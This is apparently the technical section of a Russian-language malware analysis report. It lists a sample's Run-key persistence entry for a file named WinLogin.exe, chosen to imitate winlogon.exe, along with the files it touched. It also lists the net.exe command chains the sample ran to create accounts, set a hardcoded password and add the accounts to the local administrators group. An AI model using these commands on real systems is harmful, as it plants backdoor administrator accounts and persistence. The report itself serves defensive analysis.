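Техническая информация
Ниже перечислены наблюдавшиеся действия образца: запись в ключ автозапуска Run, затронутые файлы и запущенные процессы. Имя WinLogin.exe лишь похоже на имя штатного процесса Windows winlogon.exe. Строки с cmd.exe, net.exe и net1.exe, по всей видимости, описывают одну и ту же цепочку из пяти команд (cmd.exe запускает net.exe, а тот — net1.exe): создание учётных записей и добавление их в группу administrators. Команда net user без /add задаёт пароль уже существующей учётной записи.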
- [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'CustomUser' = '<SYSTEM32>\WinLogin.exe'
- %TEMP%\autac4f.tmp
- %WINDIR%\syswow64\winlogin.exe
- %TEMP%\autac4f.tmp
- '%WINDIR%\syswow64\cmd.exe' /c net user FedExAdmin j@deRhino23
- '%WINDIR%\syswow64\cmd.exe' /c net user CorpAdmin j@deRhino23 /add
- '%WINDIR%\syswow64\cmd.exe' /c net user corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\cmd.exe' /c net localgroup administrators CorpAdmin /add
- '%WINDIR%\syswow64\cmd.exe' /c net localgroup administrators corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net.exe' user CorpAdmin j@deRhino23 /add
- '%WINDIR%\syswow64\net.exe' user FedExAdmin j@deRhino23
- '%WINDIR%\syswow64\net.exe' user corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net.exe' localgroup administrators corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net.exe' localgroup administrators CorpAdmin /add
- '%WINDIR%\syswow64\net1.exe' user CorpAdmin j@deRhino23 /add
- '%WINDIR%\syswow64\net1.exe' user FedExAdmin j@deRhino23
- '%WINDIR%\syswow64\net1.exe' user corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net1.exe' localgroup administrators corp.ds.fedex.com\453248 /add
- '%WINDIR%\syswow64\net1.exe' localgroup administrators CorpAdmin /add